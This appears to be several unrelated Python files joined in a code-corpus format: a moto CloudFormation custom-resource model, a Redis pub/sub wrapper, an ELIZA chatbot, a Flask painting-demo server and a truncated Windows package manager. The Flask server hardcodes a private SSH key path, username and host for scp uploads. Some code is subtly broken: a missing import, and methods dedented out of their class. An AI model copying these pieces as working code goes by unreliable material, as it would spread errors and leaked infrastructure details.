import threading
from moto import settings
from moto.core.models import CloudFormationModel
from moto.awslambda import lambda_backends
from uuid import uuid4
class CustomModel(CloudFormationModel):
    """In-memory model of a CloudFormation custom resource (moto).

    Creation asynchronously invokes the backing Lambda; the resource counts
    as created once the Lambda posts its response data back (set_data).
    """

    def __init__(self, region_name, request_id, logical_id, resource_name):
        self.region_name = region_name
        self.request_id = request_id
        self.logical_id = logical_id
        self.resource_name = resource_name
        # Attribute payload reported back by the custom-resource Lambda.
        self.data = dict()
        self._finished = False

    def set_data(self, data):
        """Record the Lambda's response payload and mark creation complete."""
        self.data = data
        self._finished = True

    def is_created(self):
        """True once the backing Lambda has reported back via set_data()."""
        return self._finished

    @property
    def physical_resource_id(self):
        return self.resource_name

    @staticmethod
    def cloudformation_type():
        # Custom resources have user-defined type names, so there is no
        # single fixed CloudFormation type to report here.
        return "?"

    @classmethod
    def create_from_cloudformation_json(
        cls, resource_name, cloudformation_json, region_name, **kwargs
    ):
        """Create the model, attach it to its stack, and fire the Lambda.

        The Lambda referenced by the template's ServiceToken is invoked on a
        background thread with a CloudFormation 'Create' event; it is
        expected to POST its result to the ResponseURL below.
        """
        logical_id = kwargs["LogicalId"]
        stack_id = kwargs["StackId"]
        resource_type = kwargs["ResourceType"]
        properties = cloudformation_json["Properties"]
        # ServiceToken identifies the Lambda implementing this resource.
        service_token = properties["ServiceToken"]
        backend = lambda_backends[region_name]
        fn = backend.get_function(service_token)
        request_id = str(uuid4())
        custom_resource = CustomModel(
            region_name, request_id, logical_id, resource_name
        )
        # Imported here to avoid a circular import with moto.cloudformation.
        from moto.cloudformation import cloudformation_backends
        stack = cloudformation_backends[region_name].get_stack(stack_id)
        stack.add_custom_resource(custom_resource)
        event = {
            "RequestType": "Create",
            "ServiceToken": service_token,
            # A request will be sent to this URL to indicate success/failure
            # This request will be coming from inside a Docker container
            # Note that, in order to reach the Moto host, the Moto-server should be listening on 0.0.0.0
            #
            # Alternative: Maybe we should let the user pass in a container-name where Moto is running?
            # Similar to how we know for sure that the container in our CI is called 'motoserver'
            "ResponseURL": f"{settings.moto_server_host()}/cloudformation_{region_name}/cfnresponse?stack={stack_id}",
            "StackId": stack_id,
            "RequestId": request_id,
            "LogicalResourceId": logical_id,
            "ResourceType": resource_type,
            "ResourceProperties": properties,
        }
        # Fire-and-forget: the Lambda reports completion via the ResponseURL.
        invoke_thread = threading.Thread(
            target=fn.invoke, args=(json.dumps(event), {}, {})
        )
        invoke_thread.start()
        return custom_resource

    @classmethod
    def has_cfn_attr(cls, attribute):
        # We don't know which attributes are supported for third-party resources
        return True

    def get_cfn_attribute(self, attribute_name):
        """Return one attribute from the Lambda-provided data, or None."""
        if attribute_name in self.data:
            return self.data[attribute_name]
        return None
|
pubsub_redis.py | #
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
"""
In order to run this pubsub transport, you need to have the python
'redis-py' module installed. AND you need to be running a Redis server.
"""
import threading
import time
import redis
from g2base import Callback
from g2base.remoteObjects import ro_packer
class BufferedRedis(redis.Redis):
    """
    Wrapper for Redis pub-sub that uses a pipeline internally
    for buffering message publishing. A thread is run that
    periodically flushes the buffer pipeline.
    """

    def __init__(self, *args, **kwargs):
        super(BufferedRedis, self).__init__(*args, **kwargs)
        # Flush at least every millisecond, or whenever 1000 commands queue.
        self.flush_interval = 0.001
        self.flush_size = 1000
        self.buffer = self.pipeline()
        # Serializes access to the shared pipeline between publishers and
        # the flusher thread.
        self.lock = threading.Lock()
        t = threading.Thread(target=self.flusher, args=[])
        # BUGFIX: run the flusher as a daemon thread -- its loop never
        # terminates, so a non-daemon thread kept the interpreter alive
        # forever at shutdown.
        t.daemon = True
        t.start()

    def flush(self):
        """
        Manually flushes the buffer pipeline.
        """
        with self.lock:
            self.buffer.execute()

    def flusher(self):
        """
        Thread that periodically flushes the buffer pipeline.
        """
        while True:
            time.sleep(self.flush_interval)
            with self.lock:
                self.buffer.execute()

    def publish(self, *args, **kwargs):
        """
        Overrides publish to use the buffer pipeline, flushing
        it when the defined buffer size is reached.
        """
        with self.lock:
            self.buffer.publish(*args, **kwargs)
            if len(self.buffer.command_stack) >= self.flush_size:
                self.buffer.execute()
class PubSub(Callback.Callbacks):
    """Redis-backed publish/subscribe transport.

    Wraps a Redis connection and its pubsub interface; incoming messages
    are dispatched through the g2base Callback mechanism, one callback
    slot per Redis channel.
    """

    def __init__(self, host='localhost', port=6379, db=1,
                 logger=None):
        Callback.Callbacks.__init__(self)
        self.host = host
        self.port = port
        self.db = db
        self.logger = logger
        self.redis = None
        self.pubsub = None
        # Poll interval (sec) used by get_message() in the subscribe loop.
        self.timeout = 0.2
        self.reconnect()

    def reconnect(self):
        """(Re)establish the Redis connection and subscribe to 'admin'."""
        self.redis = redis.StrictRedis(host=self.host, port=self.port,
                                       db=self.db)
        ## self.redis = BufferedRedis(host=self.host, port=self.port,
        ##                            db=self.db)
        self.pubsub = self.redis.pubsub()
        self.pubsub.subscribe('admin')

    def publish(self, channel, envelope, pack_info):
        """Serialize *envelope* with ro_packer and publish it on *channel*."""
        packet = ro_packer.pack(envelope, pack_info)
        self.redis.publish(channel, packet)

    def flush(self):
        """Flush buffered publishes, if the backend supports it."""
        if hasattr(self.redis, 'flush'):
            # only our BufferedRedis has flush
            self.redis.flush()

    def subscribe(self, channel):
        """Subscribe to *channel*, creating a local callback slot for it."""
        if not self.has_callback(channel):
            self.enable_callback(channel)
        self.pubsub.subscribe(channel)

    def unsubscribe(self, channel):
        self.pubsub.unsubscribe(channel)

    def start(self, ev_quit=None):
        """Start the background subscribe loop; set *ev_quit* to stop it."""
        if ev_quit is None:
            ev_quit = threading.Event()
        self.ev_quit = ev_quit
        t = threading.Thread(target=self.subscribe_loop,
                             args=[ev_quit])
        t.start()

    def stop(self):
        """Signal the subscribe loop to exit after its current poll."""
        self.ev_quit.set()

    def listen(self):
        """Poll for one pubsub message and dispatch it; no-op on timeout."""
        pkt = self.pubsub.get_message(timeout=self.timeout)
        if pkt is None:
            # timeout
            return
        # this is Redis API--packet will have type, channel and
        # data fields.
        if pkt['type'] != "message":
            return
        channel = pkt['channel']
        channel = channel.decode('utf-8')
        try:
            packet = pkt['data']
            envelope = ro_packer.unpack(packet)
        except Exception as e:
            if self.logger is not None:
                self.logger.error("Error unpacking payload: %s" % (str(e)))
            raise
            # need traceback
        # this will catch its own exceptions so that we don't
        # kill the subscribe loop
        self.make_callback(channel, channel, envelope)

    def subscribe_loop(self, ev_quit):
        """Run listen() repeatedly until *ev_quit* is set."""
        self.ev_quit = ev_quit
        while not ev_quit.is_set():
            self.listen()
# END
|
eliza.py | import logging
import random
import re
from collections import namedtuple
from EmotionDynamics import EmotionalAgent
import threading
# Fix Python2/Python3 incompatibility
try: input = raw_input
except NameError: pass
log = logging.getLogger(__name__)
class Key:
    """A keyword recognized by the script: its text, match priority, and
    the decomposition rules tried when the keyword fires."""

    def __init__(self, word, weight, decomps):
        # Higher weight keys are tried first; decomps is a list of Decomp.
        self.word, self.weight, self.decomps = word, weight, decomps
class Decomp:
    """One decomposition pattern for a Key, plus its reassembly templates."""

    def __init__(self, parts, save, reasmbs):
        self.parts, self.save, self.reasmbs = parts, save, reasmbs
        # Round-robin cursor into ``reasmbs``; starts at the first template.
        self.next_reasmb_index = 0
class Eliza:
    """A classic ELIZA pattern-matching chatbot, extended with a WASABI
    EmotionalAgent so responses can carry the bot's emotional state via
    the 'emoimpulsePlaceholder'/'emotionDynamicsPlaceholder' markers."""

    def __init__(self):
        self.initials = []  # opening lines
        self.finals = []    # farewell lines
        self.quits = []     # user inputs that end the session
        self.pres = {}      # substitutions applied to input before matching
        self.posts = {}     # substitutions applied to matched fragments
        self.synons = {}    # synonym classes keyed by root word
        self.keys = {}      # keyword text -> Key
        self.memory = []    # saved responses recalled when nothing matches
        #Instance of EmotionalAgent
        self.wasabi = EmotionalAgent()

    def load(self, path):
        """Parse an ELIZA script file of 'tag: content' lines into this
        instance's tables.

        'decomp' lines attach to the most recent 'key'; 'reasmb' lines
        attach to the most recent 'decomp'.
        """
        key = None
        decomp = None
        with open(path) as file:
            for line in file:
                if not line.strip():
                    continue
                # NOTE(review): assumes each line has exactly one ':';
                # extra colons in content would raise ValueError here.
                tag, content = [part.strip() for part in line.split(':')]
                if tag == 'initial':
                    self.initials.append(content)
                elif tag == 'final':
                    self.finals.append(content)
                elif tag == 'quit':
                    self.quits.append(content)
                elif tag == 'pre':
                    parts = content.split('%%')
                    self.pres[parts[0]] = parts[1:]
                elif tag == 'post':
                    parts = content.split('%%')
                    self.posts[parts[0]] = parts[1:]
                elif tag == 'synon':
                    # The root word itself is part of the synonym class.
                    parts = content.split('%%')
                    self.synons[parts[0]] = parts
                elif tag == 'key':
                    parts = content.split(' ')
                    word = parts[0]
                    # Optional second token is the key's weight; default 1.
                    weight = int(parts[1]) if len(parts) > 1 else 1
                    key = Key(word, weight, [])
                    self.keys[word] = key
                elif tag == 'decomp':
                    parts = content.split(' ')
                    save = False
                    # Leading '$' marks a memory-saving decomposition.
                    if parts[0] == '$':
                        save = True
                        parts = parts[1:]
                    decomp = Decomp(parts, save, [])
                    key.decomps.append(decomp)
                elif tag == 'reasmb':
                    parts = content.split(' ')
                    decomp.reasmbs.append(parts)

    def _match_decomp_r(self, parts, words, results):
        """Recursively match pattern *parts* against *words*.

        '*' matches any (possibly empty) span; '@root' matches one word
        from the synonym class of *root*; anything else matches a word
        case-insensitively.  Matched fragments accumulate in *results*.
        """
        if not parts and not words:
            return True
        if not parts or (not words and parts != ['*']):
            return False
        if parts[0] == '*':
            # Try the longest span first (greedy), backtracking shorter.
            for index in range(len(words), -1, -1):
                results.append(words[:index])
                if self._match_decomp_r(parts[1:], words[index:], results):
                    return True
                results.pop()
            return False
        elif parts[0].startswith('@'):
            root = parts[0][1:]
            if not root in self.synons:
                raise ValueError("Unknown synonym root {}".format(root))
            if not words[0].lower() in self.synons[root]:
                return False
            results.append([words[0]])
            return self._match_decomp_r(parts[1:], words[1:], results)
        elif parts[0].lower() != words[0].lower():
            return False
        else:
            return self._match_decomp_r(parts[1:], words[1:], results)

    def _match_decomp(self, parts, words):
        """Return the list of matched fragments, or None if no match."""
        results = []
        if self._match_decomp_r(parts, words, results):
            return results
        return None

    def _next_reasmb(self, decomp):
        """Return the next reassembly template for *decomp*, round-robin."""
        index = decomp.next_reasmb_index
        result = decomp.reasmbs[index % len(decomp.reasmbs)]
        decomp.next_reasmb_index = index + 1
        return result

    def _reassemble(self, reasmb, results):
        """Build the output word list from a reassembly template.

        Tokens of the form '(N)' are replaced with the N-th matched
        fragment (1-based), truncated at the first punctuation mark.
        """
        output = []
        for reword in reasmb:
            if not reword:
                continue
            if reword[0] == '(' and reword[-1] == ')':
                index = int(reword[1:-1])
                if index < 1 or index > len(results):
                    raise ValueError("Invalid result index {}".format(index))
                insert = results[index - 1]
                # Drop everything after the first punctuation token.
                for punct in [',', '.', ';']:
                    if punct in insert:
                        insert = insert[:insert.index(punct)]
                output.extend(insert)
            else:
                output.append(reword)
        return output

    def _sub(self, words, sub):
        """Apply the substitution table *sub* word-by-word (lowercased keys);
        each replacement may expand to several words."""
        output = []
        for word in words:
            word_lower = word.lower()
            if word_lower in sub:
                output.extend(sub[word_lower])
            else:
                output.append(word)
        return output

    def _match_key(self, words, key):
        """Try each decomposition of *key* against *words*.

        Returns the reassembled response, follows 'goto' templates to other
        keys, and stores '$'-marked responses in memory instead of
        returning them.  Returns None when nothing produced output.
        """
        for decomp in key.decomps:
            results = self._match_decomp(decomp.parts, words)
            if results is None:
                log.debug('Decomp did not match: %s', decomp.parts)
                continue
            log.debug('Decomp matched: %s', decomp.parts)
            log.debug('Decomp results: %s', results)
            results = [self._sub(words, self.posts) for words in results]
            log.debug('Decomp results after posts: %s', results)
            reasmb = self._next_reasmb(decomp)
            log.debug('Using reassembly: %s', reasmb)
            if reasmb[0] == 'goto':
                goto_key = reasmb[1]
                if not goto_key in self.keys:
                    raise ValueError("Invalid goto key {}".format(goto_key))
                log.debug('Goto key: %s', goto_key)
                return self._match_key(words, self.keys[goto_key])
            output = self._reassemble(reasmb, results)
            if decomp.save:
                self.memory.append(output)
                log.debug('Saved to memory: %s', output)
                continue
            return output
        return None

    def respond(self, text):
        """Produce a response to *text*; None means the user quit.

        Pipeline: normalize punctuation, apply pre-substitutions, try keys
        by descending weight, fall back to memory or the 'xnone' key, then
        process the emotion placeholders via the WASABI agent.
        """
        if text.lower() in self.quits:
            return None
        # Isolate punctuation as separate tokens.
        text = re.sub(r'\s*\.+\s*', ' . ', text)
        text = re.sub(r'\s*,+\s*', ' , ', text)
        text = re.sub(r'\s*;+\s*', ' ; ', text)
        log.debug('After punctuation cleanup: %s', text)
        words = [w for w in text.split(' ') if w]
        log.debug('Input: %s', words)
        words = self._sub(words, self.pres)
        log.debug('After pre-substitution: %s', words)
        keys = [self.keys[w.lower()] for w in words if w.lower() in self.keys]
        keys = sorted(keys, key=lambda k: -k.weight)
        log.debug('Sorted keys: %s', [(k.word, k.weight) for k in keys])
        output = None
        for key in keys:
            output = self._match_key(words, key)
            if output:
                log.debug('Output from key: %s', output)
                break
        if not output:
            if self.memory:
                # Recall a random remembered response.
                index = random.randrange(len(self.memory))
                output = self.memory.pop(index)
                log.debug('Output from memory: %s', output)
            else:
                output = self._next_reasmb(self.keys['xnone'].decomps[0])
                log.debug('Output from xnone: %s', output)
        #random emotion selection for task 2
        #emotionList = ["gluecklich", "traurig", "wuetend", "ausgeglichen"]
        output = " ".join(output)
        #emotion gets an impulse
        # The marker is followed by a float impulse value (marker is 21
        # chars + 1 separator = offset 22); it is stripped from the output.
        if "emoimpulsePlaceholder" in output:
            self.wasabi.emoimpulse(float(output[output.find("emoimpulsePlaceholder")+22:]))
            self.wasabi.calculate_emotions()
            output = output[:output.find("emoimpulsePlaceholder")]
        #user asks for emotion
        output = output.replace("emotionDynamicsPlaceholder", self.wasabi.get_emotion())
        return output

    def initial(self):
        """Return a random opening line."""
        return random.choice(self.initials)

    def final(self):
        """Return a random farewell line."""
        return random.choice(self.finals)

    def run(self):
        """Interactive REPL: prompt, respond, stop on a quit phrase."""
        print(self.initial())
        while True:
            sent = input('> ')
            output = self.respond(sent)
            if output is None:
                break
            print(output)
        print(self.final())
def main():
    """Wire up the chatbot: start the background emotion thread, load the
    German script, and run the interactive loop."""
    eliza = Eliza()
    #new Thread for emotion changes over time e.g. getting bored
    t = threading.Thread(target=eliza.wasabi.calculate_emotions_continuously)
    # Daemon so the emotion thread cannot keep the process alive after the
    # REPL exits.
    t.daemon = True
    t.start()
    eliza.load('doctor_de.txt')
    eliza.run()

if __name__ == '__main__':
    logging.basicConfig()
    main()
|
server.py | from flask import Flask
from flask import request, Response, render_template, json, url_for
from flask_restful import reqparse, abort, Api, Resource
import os
import base64
from io import BytesIO
import qrcode
import time
import threading
# Create an instance of Flask API
app = Flask(__name__, template_folder="templates")
api = Api(app)
# Create a URL route in our application for "/"
@app.route('/')
def home():
    """
    This function just responds to the browser ULR
    localhost:5000/
    :return: the rendered template 'index.html'
    """
    template_name = 'index.html'
    return render_template(template_name)
# For developing purpose - test camera toggle
@app.route('/test_tab')
def test_tab():
    """Development-only page used to test the camera toggle."""
    template_name = 'test_tab.html'
    return render_template(template_name)
# class ImageHandler(Resource):
# def post(self):
# # image_data = request.form.get('upimage')
# image_data = request.files.get('upimage')
# print(image_data)
# if image_data is not None:
# image_data.save('image.jpg')
# else:
# print('Warning: Empty picture! Make sure that the browser has the permission to use the camera.')
# # with open('image.png', 'wb') as fout:
# # fout.write(image_data)
"""
Contains a POST function.
- Post the uploaded movie URL to /qr endpoint, return generated QR image in binary data as the body of POST response.
"""
class QRGenerator(Resource):
    """REST endpoint: POST a URL/text to /qr, get back the QR image path."""

    def post(self):
        """Render the posted 'text_data' form field as a QR code PNG and
        return a JSON payload pointing at the saved static file."""
        text_data = request.form.get('text_data')
        print('The param is', text_data)
        print(app.instance_path)
        qr_image = qrcode.make(text_data)
        qr_image.save('qr.png')
        return json.dumps({'src': url_for('static', filename='qr.png')})
"""
Contains a GET function.
- Get the URL of the uploaded movie URL via specified `movie_id`.
Contains a POST function.
- Post the taken image to server, the server will use pretrained model to generate strokes and movie on local.
The movie is uploaded to a remote server and a mapped QR code is generated.
"""
class RelayServer(Resource):
    """REST endpoint that turns an uploaded photo into a painted movie.

    POST: save the photo, run the painting model, encode/upload the movie,
    and return a QR code for the shared link.  GET: poll whether the movie
    for a given id is ready.
    """

    def __init__(self):
        super(RelayServer, self).__init__()
        # Directory for rendered images
        self.output_dir = 'app/output'
        # For support multiple users
        self.user_id = 0
        # Timestamps of users whose renders are in flight.
        self.active_users = []
        # TODO: what does movie_link_dict mean?
        self.movie_link_dict = dict()
        self.last_sharable_movie_link = None

    # def movie_upload_daemon(self):
    #     """
    #     For QR code, to check if movies are uploaded to expected URL every 5 seconds.
    #     """
    #     # TODO: login to SURFdrive, upload movie, get sharable link
    #     # def upload_movie_to_drive(active_user, output_dir):
    #     #     movie_path = os.path.join(output_dir, str(active_user), 'video.mp4')
    #     #     new_video_fn = 'video_%s.mp4' % output_dir
    #     #     shared_link = None
    #     #     return shared_link
    #     def check_upload(active_users_list, output_dir, movie_link_dict):
    #         while True:
    #             print('Checking %d active users' % len(active_users_list))
    #             for active_user in active_users_list:
    #                 # check if movie exists
    #                 movie_path = os.path.join(output_dir, str(active_user), 'video.mp4')
    #                 if os.path.isfile(movie_path):
    #                     # movie exists. Check whether it is uploaded to the server.
    #                     if movie_path in movie_link_dict.values():
    #                         # movie has been shared. Remove from monitoring
    #                         active_users_list.remove(active_user)
    #                     else:
    #                         # check whether movie is fully sync'ed by determining whether an empty file `DONE` is present
    #                         if os.path.isfile(os.path.join(output_dir, str(active_user), 'DONE')):
    #                             # movie is fully downloaded, upload the movie now
    #                             # shared_link = upload_movie_to_drive(active_user, output_dir)
    #                             # link_dict[movie_path] = shared_link
    #                             print('movie_path', movie_path, url_for('static', filename=movie_path))
    #                             movie_link_dict[active_user] = movie_path
    #                         else:
    #                             # movie is still downloading. Just wait
    #                             pass
    #             time.sleep(5)
    #     try:
    #         th = threading.Thread(target=check_upload, args=(self.active_users, self.output_dir, self.movie_link_dict))
    #         th.start()
    #         return th
    #     except:
    #         print('Error: unable to start the daemon to upload the movie!')
    #         return None

    def get(self):
        """
        Using HTTP GET to submit an ID (which is the timestamp) of the rendered movie.
        Return: The URL of the movie if it is ready. Otherwise return an empty URL.
        """
        ts = request.args.get('movie_id')
        print('Get a request')
        movie_path = os.path.join(self.output_dir, str(ts), 'video.mp4')
        print("movie path is", movie_path)
        if os.path.isfile(movie_path):
            movie_shared_url = 'https://home.maxwellcai.com/learning_to_paint_videos/video_output/%s.mp4' % str(ts)
            print('Sharable movie link', movie_shared_url)
            return json.dumps({'src': url_for('static', filename=os.path.join('output', str(ts), 'video.mp4')), 'sharable': movie_shared_url})
        else:
            return json.dumps({'src': ""})  # return empty URL if movie is not yet ready

    def post(self):
        """Handle a photo upload: render, encode, upload, return QR link.

        Runs the whole pipeline synchronously in the request (model
        inference, ffmpeg encode, scp upload), so the response can take a
        long time.  Paths to the model and ssh key are machine-specific.
        """
        # Extract taken picture data.
        image_data = request.files.get('upimage')
        if image_data is not None:
            # The upload timestamp doubles as the per-user id / movie id.
            timestamp = time.time()
            self.active_users.append(timestamp)
            user_output_dir = os.path.join(self.output_dir, str(timestamp))
            print("user_output_dir", user_output_dir)
            if not os.path.isdir(user_output_dir):
                os.makedirs(user_output_dir)
            # save camera image.
            print("Save camera images...")
            image_data.save(os.path.join(user_output_dir, 'image.jpg'))
            # generate the movie frame
            orig_dir = os.getcwd()
            print("original dir is", orig_dir)
            os.chdir(user_output_dir)
            print('Generating frames...')
            os.system('python /Users/pennyqxr/Code/LearningToPaintDemo/baseline/test.py --img image.jpg --actor /Users/pennyqxr/Code/LearningToPaintDemo/baseline/model/actor.pkl --renderer /Users/pennyqxr/Code/LearningToPaintDemo/baseline/model/renderer.pkl')
            # generate the movie
            print('Generate movie...')
            os.system('ffmpeg -r 30 -f image2 -i output/generated_%05d.jpg -s 512x512 -c:v libx264 -pix_fmt yuv420p video.mp4 -q:v 0 -q:a 0')
            # DONE marker tells pollers the encode finished.
            os.system('touch DONE')
            # upload the movie to a HTTPS server
            os.system('scp -i /Users/pennyqxr/.ssh/id_rsa_pi -P 13893 video.mp4 pi@home.maxwellcai.com:/var/www/html/learning_to_paint_videos/video_output/%s.mp4' % str(timestamp))
            # get back to the original dir
            os.chdir(orig_dir)
            # generate QR code of the movie
            movie_shared_url = 'https://home.maxwellcai.com/learning_to_paint_videos/video_output/%s.mp4' % str(timestamp)
            self.last_sharable_movie_link = movie_shared_url
            qr_link = self.generate_qr_code(movie_shared_url, timestamp)
            self.user_id += 1
            return json.dumps({'src': qr_link, 'ts': timestamp, 'sharable': movie_shared_url})
        else:
            print('Warning: Empty picture! Make sure that the browser has the permission to use the camera.')

    def generate_qr_code(self, shared_link, timestamp):
        """
        Generate a QR code so that the user can download the rendered movie.
        Return: a JSON string with the URL of the QR code (to be displayed in the web interface).
        """
        img_qr = qrcode.make(shared_link)
        try:
            if not os.path.isdir('app/static/qr'):
                os.makedirs('app/static/qr')
            img_qr.save(os.path.join('app/static/qr', 'qr_%s.png' % str(timestamp)))
        except OSError as error:
            print("Error when generate QR code", error)
            return None
        # create a URL for generated QR code
        return url_for('static', filename='qr/qr_%s.png' % str(timestamp))
# Setup the Api resource routing here
api.add_resource(QRGenerator, '/qr')
api.add_resource(RelayServer, '/server')

# Start the application by running as the main program itself
if __name__ == '__main__':
    # debug=True enables the reloader/debugger -- development use only.
    app.run(debug=True)
|
PackageManager.py | ######################################################################
# PACKAGE MANAGER #
######################################################################
from logger import log_info, closeLog
from Classes.Download import Download
from Classes.Install import Install
from multiprocessing import Process
from subprocess import PIPE
from threading import Thread
from colorama import Back
from extension import *
from utils import *
from time import *
import subprocess
import tempfile
import requests
import zipfile
import cursor
import click
import sys
import os
# Maps a package's display name to its downloaded installer path; filled by
# PackageManager.download() and consumed by the install steps.
paths = {}
class PackageManager:
def __init__(self, packets, metadata):
self.packets = packets
self.metadata = metadata
    def download(self, download: Download):
        """Stream one installer into %TEMP%\\electric with a console
        progress bar, and record the saved path in the module-level
        ``paths`` map keyed by display name."""
        cursor.hide()  # hide the terminal cursor while the bar redraws
        if not os.path.isdir(Rf'{tempfile.gettempdir()}\electric'):
            os.mkdir(Rf'{tempfile.gettempdir()}\electric')
        path = Rf'{tempfile.gettempdir()}\electric\{download.name}{download.extension}'
        with open(path, 'wb') as f:
            response = requests.get(download.url, stream=True)
            total_length = response.headers.get('content-length')
            if total_length is None:
                # Server did not report a size; write it all, no progress bar.
                f.write(response.content)
            else:
                dl = 0
                full_length = int(total_length)
                for data in response.iter_content(chunk_size=4096):
                    dl += len(data)
                    f.write(data)
                    # 20-character bar scaled to bytes received so far.
                    complete = int(20 * dl / full_length)
                    fill_c, unfill_c = '█' * complete, ' ' * (20 - complete)
                    try:
                        sys.stdout.write(
                            f"\r[{fill_c}{unfill_c}] ⚡ {round(dl / full_length * 100, 1)} % ⚡ {round(dl / 1000000, 1)} / {round(full_length / 1000000, 1)} MB")
                    except UnicodeEncodeError:
                        # Console code page cannot render the bar glyphs.
                        pass
                    sys.stdout.flush()
        paths.update({download.display_name: {'path': path,
                                              'display_name': download.display_name}})
        cursor.show()
    def install_package(self, install: Install) -> str:
        """Run the downloaded installer described by *install*.

        Dispatches on the download type: '.exe' and '.msi' are executed
        silently via run_cmd with the package's install switches; '.zip'
        archives are extracted and the user picks an executable from an
        interactive arrow-key menu.
        """
        path = install.path
        switches = install.install_switches
        download_type = install.download_type
        custom_install_switch = install.custom_install_switch
        directory = install.directory
        if download_type == '.exe':
            # Windows needs the .exe suffix for the file to be executable.
            if '.exe' not in path:
                if not os.path.isfile(path + '.exe'):
                    os.rename(path, f'{path}.exe')
                path = path + '.exe'
            command = path + ' '
            for switch in switches:
                command = command + ' ' + switch
            if custom_install_switch and directory:
                if '/D=' in custom_install_switch:
                    # NSIS-style /D= must not quote the directory.
                    command += ' ' + custom_install_switch + f'{directory}'
                else:
                    command += ' ' + custom_install_switch + f'"{directory}"'
            # if custom_install_switch == '':
            #     click.echo(click.style(
            #         f'Installing {install.display_name} To Default Location, Custom Installation Directory Not Supported By This Installer!', fg='yellow'))
            if custom_install_switch == 'None':
                click.echo(click.style(
                    f'Installing {install.display_name} To Default Location, Custom Installation Directory Not Supported By This Installer!', fg='yellow'))
            run_cmd(command, self.metadata, 'installation', install.display_name)
        elif download_type == '.msi':
            command = 'msiexec.exe /i' + path + ' '
            for switch in switches:
                command = command + ' ' + switch
            run_cmd(command, self.metadata, 'installation', install.display_name)
        elif download_type == '.zip':
            if not self.metadata.no_color:
                click.echo(click.style(
                    f'Unzipping File At {path}', fg='green'))
            if self.metadata.no_color:
                click.echo(click.style(
                    f'Unzipping File At {path}'))
            zip_directory = fR'{tempfile.gettempdir()}\\{self.metadata.display_name}'
            with zipfile.ZipFile(path, 'r') as zip_ref:
                zip_ref.extractall(zip_directory)
            executable_list = []
            for name in os.listdir(zip_directory):
                if name.endswith('.exe'):
                    executable_list.append(name)
            executable_list.append('Exit')
            file_path = fR'{tempfile.gettempdir()}\\{self.metadata.display_name}'

            def trigger():
                # Redraw the menu, highlighting the selected row.
                click.clear()
                for executable in executable_list:
                    if executable == executable_list[index]:
                        print(Back.CYAN + executable + Back.RESET)
                    else:
                        print(executable)
            trigger()

            def up():
                # Move the selection cursor up (wraps past the end).
                global index
                if len(executable_list) != 1:
                    index -= 1
                    if index >= len(executable_list):
                        index = 0
                    trigger()
                    return
                trigger()

            def down():
                # Move the selection cursor down (wraps past the end).
                global index
                if len(executable_list) != 1:
                    index += 1
                    if index >= len(executable_list):
                        index = 0
                    trigger()
                    return
                trigger()

            def enter():
                # Run the selected executable, or exit the process on 'Exit'.
                if executable_list[index] == 'Exit':
                    os._exit(0)
                else:
                    path = file_path + "\\" + executable_list[index]
                    click.echo(click.style(
                        f'Running {executable_list[index]}. Hit Control + C to Quit', fg='magenta'))
                    subprocess.call(path, stdout=PIPE,
                                    stdin=PIPE, stderr=PIPE)
                    quit()
            # NOTE(review): ``keyboard`` is not among this file's visible
            # imports -- presumably provided by a star import (extension/
            # utils); verify it is actually in scope.
            # NOTE(review): ``index`` is used as a module-level global but no
            # initialization is visible here; confirm it is set before these
            # hotkey handlers can fire.
            keyboard.add_hotkey('up', up)
            keyboard.add_hotkey('down', down)
            keyboard.add_hotkey('enter', enter)
            keyboard.wait()
def calculate_spwn(self, number: int) -> str:
    """Pick the concurrency strategy for a batch of downloads.

    Small batches (3 or fewer) use threads; larger batches use
    separate processes.
    """
    return 'threading' if number <= 3 else 'processing'
def handle_dependencies(self):
    """Install the dependencies declared by each packet, skipping
    packets that declare none."""
    for pkt in self.packets:
        if not pkt.dependencies:
            continue
        install_dependent_packages(pkt, self.metadata.rate_limit, pkt.directory, self.metadata)
def handle_multi_download(self) -> dict:
    """Download every packet in self.packets concurrently.

    Dependencies are installed first, then one Download item per packet
    is created (targeting %TEMP%\\SetupN<ext>) and fetched either on
    threads (small batches) or processes (large batches), optionally
    virus-scanned afterwards.

    Returns:
        dict mapping downloaded-file path -> {'display_name': ..., 'path': ...},
        the shape consumed by generate_installers() (via .items()) and by
        handle_multi_install()'s cleanup loop (iterating the keys as paths).
    """
    self.handle_dependencies()
    metadata = self.metadata
    write('Successfully Transferred Electrons', 'cyan', metadata)
    log_info('Electrons Successfully Transferred', metadata.logfile)
    write('Initializing Rapid Download...', 'green', metadata)
    log_info('Initializing Rapid Download...', metadata.logfile)
    packets = self.packets
    download_items = []
    # One Download per packet; enumerate covers both the single- and
    # multi-packet cases the original spelled out separately (idx 0 -> 'Setup0').
    for idx, packet in enumerate(packets):
        download_items.append(Download(packet.win64, packet.win64_type,
                                       f'Setup{idx}', packet.display_name,
                                       f"{tempfile.gettempdir()}\\Setup{idx}{packet.win64_type}"))
    for item in download_items:
        write_verbose(f'Sending request to {item.url} for downloading {item.display_name}', self.metadata)
        write_debug(f'Downloading {item.display_name} from {item.url} into {item.name}{item.extension}', self.metadata)
    # <= 3 packets -> threads (I/O bound), otherwise separate processes.
    method = self.calculate_spwn(len(packets))
    if method == 'threading':
        workers = [Thread(target=self.download, args=(item,)) for item in download_items]
    else:
        workers = [Process(target=self.download, args=(item,)) for item in download_items]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
    for item in download_items:
        if self.metadata.virus_check:
            write(
                f'\nScanning {item.display_name} For Viruses...', 'blue', metadata)
            check_virus(item.path, metadata)
    write_debug(f'Rapid Download Successfully Downloaded {len(download_items)} Packages Using RapidThreading', metadata)
    write_debug('Rapid Download Exiting With Code 0', metadata)
    if not self.metadata.debug:
        write('\nFinished Rapid Download...', 'green', metadata)
    else:
        write('Finished Rapid Download...', 'green', metadata)
    log_info('Finished Rapid Download', metadata.logfile)
    write(
        'Using Rapid Install, Accept Prompts Asking For Admin Permission...', 'cyan', metadata)
    log_info(
        'Using Rapid Install To Complete Setup, Accept Prompts Asking For Admin Permission...', metadata.logfile)
    # BUG FIX: the original ended with `return paths` although no `paths`
    # name was ever bound here (guaranteed NameError). Build the mapping
    # its consumers actually read.
    paths = {item.path: {'display_name': item.display_name, 'path': item.path}
             for item in download_items}
    return paths
def generate_installers(self, paths) -> list:
    """Build Install items for the downloaded files and split them by type.

    Args:
        paths: mapping of downloaded-file path -> {'display_name': ..., 'path': ...}
               (as produced by handle_multi_download()).

    Returns:
        [exe_list, msi_list, other_list] via generate_split().
    """
    packets = self.packets
    install_items = []
    if len(packets) > 1:
